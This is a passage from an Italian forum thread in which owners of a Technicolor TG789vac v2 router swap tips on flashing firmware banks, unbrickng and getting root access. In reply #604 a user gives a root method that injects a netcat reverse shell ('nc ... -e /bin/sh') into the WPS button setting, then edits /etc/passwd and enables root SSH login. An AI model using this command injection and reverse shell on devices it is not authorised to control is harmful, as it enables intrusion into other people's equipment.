[GUIDA] Flash, Root e Modding Technicolor TG789vac v2 (VANT-6)

• 4738 Risposte
  • 2438156 Visite

Offline renpasa

• Membro Anziano
  • 114
Re:[GUIDA] TG789vac v2 iiNET/UNO Flash, Sblocco e Modding
« Risposta #600 il: 16 Maggio 2018, 21:50 »
@larsen64it
Ho notato, meglio, mi sembra di aver notato che le versioni del bootloader dei due router sono differenti, è normale?
ho pensato (?) di provare, seguendo questa tua procedura: https://www.ilpuntotecnico.com/forum/index.php/topic,77981.msg234001.html#msg234001
a provare ad installare il firmware TIM, del quale dovrei avere dei "config" già sbloccati, copiare con telnet la partizione 1 sulla 2 e a questo punto dovrei trovarmi con il mio modem router bello pulito e pronto per ricevere in sequenza iinet 2.3 e iinet 2.2.1 con il quale sbloccare il primo.
Cosa ne pensi?
Ciao Renato

@^NiCo^
avevo promesso di provare il sistema di sblocco suggerito, son stato su quel forum ho letto le istruzioni e, temo che per me siano un po' troppo complicate, e non sono uno che si tira indietro.:)
Ciao Renato
« Ultima modifica: 16 Maggio 2018, 21:52 da renpasa »

Offline ^NiCo^

• Ex-Staff
  • Esperto
  • 1258
  • Se non và dagli un calcio e riprova.
« Risposta #601 il: 16 Maggio 2018, 22:24 »
@Crist Se dice così la connessione è avvenuta, se dai un comando qualsiasi dovrebbe rispondere, ex. uci show dropbear etc

Io sono tornato adesso, tra poco provo pure io

Offline Crist

• Membro Giovane
  • **
  • 79
« Risposta #602 il: 16 Maggio 2018, 23:04 »
Come non detto: dopo vari tentativi  :headbang: ha preso i comandi!
Procedura perfetta!
Ho inserito una USB da 1GB (come già suggerito da altri, meglio usare tagli piccoli), ho modificato passwd con Notepad++ et...voilà!
Accesso root! :clap:

Offline ^NiCo^

• Ex-Staff
  • Esperto
  • 1258
« Risposta #603 il: 17 Maggio 2018, 00:06 »
@renpasa Don't worry credo di aver trovato il modo di semplificare (DI MOLTO(se funziona)) la guida per UNO 17.2

EDIT
Cassata eliminata :P, arrivo a sera un pò troppo cotto.

EDIT2
Purtroppo il modo super-semplice non sembra funzionare ma è cmq possibile accorciare la guida eliminando la copia dei file per modificarli, domani se qualcuno non mi precede posto come fare.
« Ultima modifica: 17 Maggio 2018, 02:44 da ^NiCo^ »

Offline ^NiCo^

• Ex-Staff
  • Esperto
  • 1258
« Risposta #604 il: 17 Maggio 2018, 03:41 »
Invece la posto adesso stringata e poi magari la aggiusto un pò.  :evilgrin:

-Impostare netcat in ascolto con nc -lvvp 1337
-Loggare SSH con account engineer (la password è la solita per entrare come admin sulla pagina web)
-Copia,incolla e invio di questo comando set [email protected] 'nc 192.168.1.XYZ 1337 -e /bin/sh'
 *192.168.1.XYZ l' ip della macchina dove è in ascolto netcat
-Premere il pulsante laterale per far partire la connessione con netcat
-Ripristinare il tasto wps con questo comando set [email protected] 'wps_button_pressed.sh'
-Dare in pasto questi comandi uno ad uno nella shell aperta su netcat
Codice: [Seleziona]
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd
uci set dropbear.lan.RootPasswordAuth='on'
uci set dropbear.lan.RootLogin='1'
uci commit
/etc/init.d/dropbear restart
passwd
*passwd chiede di inserire la nuova password per l' utente root
-Finito, ora è possibile loggare con ssh 192.168.1.1 porta 22 user root pass vostrapass
« Ultima modifica: 17 Maggio 2018, 07:22 da ^NiCo^ »

Offline larsen64it

• VIP
  • 2696
« Risposta #605 il: 17 Maggio 2018, 05:49 »
@LuKePicci A parte che per stappare ogni occasione è buona. Un risultato lo hai ottenuto: quello di avere tutti i file per il ripristino del fw FB, esportabile (previo reset) su altri router. Per altre cose che vai cercando credo di non poterti essere di alcun aiuto. Se ti serve allego script per salvarti tutti i blocchi in locale via ssh
hzzps://www9.zippyshare.com/v/9f0J2XoL/file.html

@renpasa Penso che tentar non nuoce.

@^NiCo^ Arrivare a sera troppo cotto e dura ma tirare fino alla mattina certo non ti giova.
Grazie per aver fatto il turno di notte a "ilpuntotecnicoeadsl". Diavolo briccone.

Offline LuKePicci

• Global Moderator
  • VIP
  • 2789
« Risposta #606 il: 17 Maggio 2018, 10:43 »
Alla salute allora!

Il Backup dei blocchi lo avevo già fatto come primo step. Ora mi sto ripassando su binwalk ogni pezzettino di flash, magari salta fuori qualcosa. Due domande:

1) Cosa dovevo modificare per attivare la porta seriale? (non si sa mai, dovesse andare storto qualcosa...)
2) Ma sui fw basati su Openwrt come iiNet la CLI di Technicolor non c'è vero?

Offline larsen64it

• VIP
  • 2696
« Risposta #607 il: 17 Maggio 2018, 11:46 »
1) Decommenta l'ultima riga alla voce tty in /etc/inittab
2) Corretto, hanno cercato di fare qualche cosa di simile in UNO: entrando come engineer si ha una shell diversa da root.

Offline lionhe

• Membro Giovane
  • **
  • 69
« Risposta #608 il: 17 Maggio 2018, 14:32 »
@^NiCo^ Ho provato a entrare come engineer nel firmware tim 1.0.6 ma non riconosce nessuna password. Forse l'utente non esiste? Non si potrebbe aggiungerlo editando il file config decriptato e ricriptato? Forse lo si potrebbe desumere da un file security.cfg estratto dai firmware IINET oppure UNO?
LionHe

Offline ^NiCo^

• Ex-Staff
  • Esperto
  • 1258
« Risposta #609 il: 17 Maggio 2018, 22:56 »
@lionhe il fw tim per il 789 non è basato su homeware(openwrt), non credo che la cosa funzioni.
« Ultima modifica: 17 Maggio 2018, 23:25 da ^NiCo^ »

Offline gianky89

• Nuovo Iscritto
  • *
  • 19
« Risposta #610 il: 18 Maggio 2018, 19:46 »
Salve a tutti, so che mi odierete per ciò che sto per chiedervi ma non posso farne a meno, è tutto il pomeriggio che sto leggendo tutte le 41 pagine del topic ma i pezzi da mettere insieme sono troppi e mi sta andando il cervello in fumo, quindi per evitare di fare danni mi rivolgo a voi secondo le mie necessità.

Sto pagando questo orrido scolapasta SMART MODEM TECHNICOLOR AGCOMBO TG789vac v2 AGTOT 1.0.6  brand TIM e dovrò farlo mensilmente per i prossimi 4 anni, avrei preferito spararmi su un alluce. In ogni caso mi sono deciso a sbloccarlo dopo aver riscontrato che l' UPnP funziona una ciofeca e il port forwarding è limitato a 10 porte (no comment). Dopo averlo sostituito col Sercomm tutti i miei problemi di NAT sono scomparsi.

In ogni caso, mi pare di aver capito che iiNet e UNO siano fw basati su openwrt, quindi gestibili solo da terminale. Mi pare di aver visto l'immagine postata di una GUI, quindi suppongo ci siano fw che mi permettano di avere interfaccia grafica sbloccando il router. Potreste gentilmente farmi capire quale fw utilizzare da applicare alla guida di sblocco per avere interfaccia grafica? Vi ringrazio anticipatamente per il tempo che mi dedicherete.
« Ultima modifica: 18 Maggio 2018, 19:49 da gianky89 »

Offline renpasa

• Membro Anziano
  • 114
« Risposta #611 il: 18 Maggio 2018, 20:11 »
@larsen64it
@^NiCo^
@Chiunque al quale possa interessare.
Ho risolto il mio problema!
Non riuscivo ad accedere al bank 2 e quindi al firmare ivi istallato. iiNet 2.2.1
Dopo circa una settimana di tentativi e di rotture agli amici del forum, ho risolto in questo modo.
Da bank1 attivo, con iinet 2.3.0 ho tentato l'installazione di un fimware TIm dalla WEB GUI tentativo ovviamente fallito ma....al riavvio mi sono trovato su bank 2, già sbloccato.
da li ho installato lo stesso iiNet 2.3.0 che ovviamente è finito sul bank1, ovviamente bloccato.
Da WEB GUI ho riflaschato iiNet 2.2.1 che è finito sul bank2, lo ho sbloccato, con un vecchio file config e da lì ho fatto lo sblocco del iiNet 2.3.0.
Credo la chiave di tutto sia stata la fallita installazione del firmware TIM che mi ha comunque spedito nel bank 2 prima irraggiungibile.
Ringrazio infinitamente larsen64it,  ^NiCo^ e ovviamente tutti quelli che mi hanno dato il loro aiuto.
Oggi è venerdì, serata libera, festeggerò a modo mio. :D
Per inciso, avrei festeggiato a modo mio comunque.
Ancora grazie a tutti Renato

Offline gianky89

• Nuovo Iscritto
  • *
  • 19
« Risposta #612 il: 18 Maggio 2018, 20:23 »
@gianky89 la confusione è giustificabile, i toni polemici no  ;)

Hai ragione, sono un po' avvelenato, ho passato una settimana d'inferno dietro questo modem, scusatemi.

Offline larsen64it

• VIP
  • 2696
« Risposta #613 il: 18 Maggio 2018, 21:04 »
@renpasa
Per quanto mi riguarda i ringraziamenti erano compresi nel piacere di averti aiutato.
Per spirito di corpo rispondo: DOVERE!

@gianky89
Il mio consiglio dopo aver sbloccato una bank, mediante telnet accedere alla CLI technicolor duplicare la bank attiva su quella passiva, fare switchover. Una volta sbloccate tutte 2 le banks (cosa che ti tornerà molto utile per eventuali ripensamenti) riposta e sicuramente troverai qualcuno a darti una mano. Capisco che il topic è un po' disordinato, ma questo è dovuto al fatto che è tutto un WIP.

Offline lionhe

• Membro Giovane
  • **
  • 69
« Risposta #614 il: 19 Maggio 2018, 01:54 »
Purtroppo sono caduto nella condizione del led fisso arancione con un tg789vac v2 di tim.
Avevo agtot 1.0.4 in una bank e agtot1.0.6 nell'altra. Con  una certa difficoltà ero riuscito flashare con tftpd32 la versione 2.2.1 del firmware iinet e avevo sbloccato l'accesso ssh con la falla del ping.

Avevo guardato il contenuto della cartella overlay ma c'erano riferimenti solo a bank1.

Non trovavo dove era montata la chiave usb per fare una copia del contenuto di quell'overlay e, siccome era tardi, avevo deciso di dare il comando switchover  :facepalm: in modo da tornare al firmware tim che pensavo fosse nell'altra bank e poter proseguire il lavoro domani.

Purtroppo da allora al boot si accende la luce arancione e dopo un minuto si spegne il led della porta ethernet e  comincia a lampeggiare il led verde del broadband  per circa 20 secondi. Dopo un altro po di tempo si accende anche il led ethernet , ma rimane acceso anche quando stacco il cavo dal pc. Schiacciando il reset anche per parecchio tempo non riesco a far partire il bootp.

@larsen64it parlava di una finestra di 25 secondi per far credere al firmware che il boot della bank è fallito: ma quando parte questa finestra?
Vi ringrazio per l'aiuto che mi potrete dare.
LionHe
« Ultima modifica: 19 Maggio 2018, 07:27 da lionhe »